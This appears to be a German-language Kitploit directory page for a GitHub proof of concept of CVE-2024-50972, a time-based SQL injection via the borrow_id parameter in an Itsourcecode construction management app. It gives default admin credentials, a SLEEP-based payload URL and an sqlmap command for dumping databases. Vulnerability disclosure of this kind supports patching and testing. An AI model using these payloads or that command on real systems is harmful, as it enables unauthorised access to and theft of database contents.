Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/akhlak2511/cve-2024-50972
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstestsDatenbanksicherheit
GitHubakhlak2511/cve-2024-50972

CVE-2024-50972

Proof-of-Concept für SQL-Injection im Itsourcecode Construction Management System 1.0, der zeitbasierte Injection über den borrow_id-Parameter demonstriert und Ausnutzungsschritte bereitstellt.

Repository anzeigen
3vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-50972

Beschreibung

Eine SQL-Injection-Schwachstelle in printtool.php des Itsourcecode Construction Management System 1.0 ermöglicht es entfernten Angreifern, beliebige SQL-Befehle über den Parameter borrow_id auszuführen.

Schwachstellentyp

SQL-Injection

Anbieter des Produkts

Itsourcecode

Betroffene Produktcodebasis:

https://itsourcecode.com/free-projects/php-project/construction-management-system-project-in-php-with-source-code/ - 1.0

Betroffene Komponente:

Das Itsourcecode Construction Management System v1.0 ist anfällig für SQL-Injection über den Parameter borrow_id auf der Seite printtool.php

Angriffsvektoren:

  1. Richten Sie die Anwendung lokal ein und melden Sie sich mit den Administrator-Anmeldedaten admin:admin an.
  • Navigieren Sie in Ihrem Browser zur folgenden URL: http://localhost/monitoring_system/printtool.php?borrow_id=5
  • SQL-Payload injizieren: Modifizieren Sie den Parameter borrow_id in der URL, um eine zeitbasierte SQL-Injection-Payload einzufügen. http://localhost/monitoring_system/printtool.php?borrow_id=5'+AND+(SELECT+7254+FROM+(SELECT(SLEEP(20)))rcGT)--+xxQB
  • Beobachten Sie die Anwendungsantwort: Die Seite sollte merklich länger (20 Sekunden) zum Laden benötigen, wenn die Injektion erfolgreich ist, was bestätigt, dass der Parameter borrow_id anfällig für SQL-Injection ist.
  • Verwenden Sie nun das SQLMap-Tool zur weiteren Ausbeutung und zum Dumpen von Datenbanken mit dem folgenden Befehl: sqlmap.py -u http://localhost/monitoring_system/printtool.php?borrow_id=5 --risk 3 --level 3 --cookie="PHPSESSID=your_cookie_here" --dbs --technique=T --dump --no-cast
  • Referenz:

    1. https://itsourcecode.com/free-projects/php-project/construction-management-system-project-in-php-with-source-code/
    2. https://owasp.org/www-community/attacks/SQL_Injection
    Tool herunterladen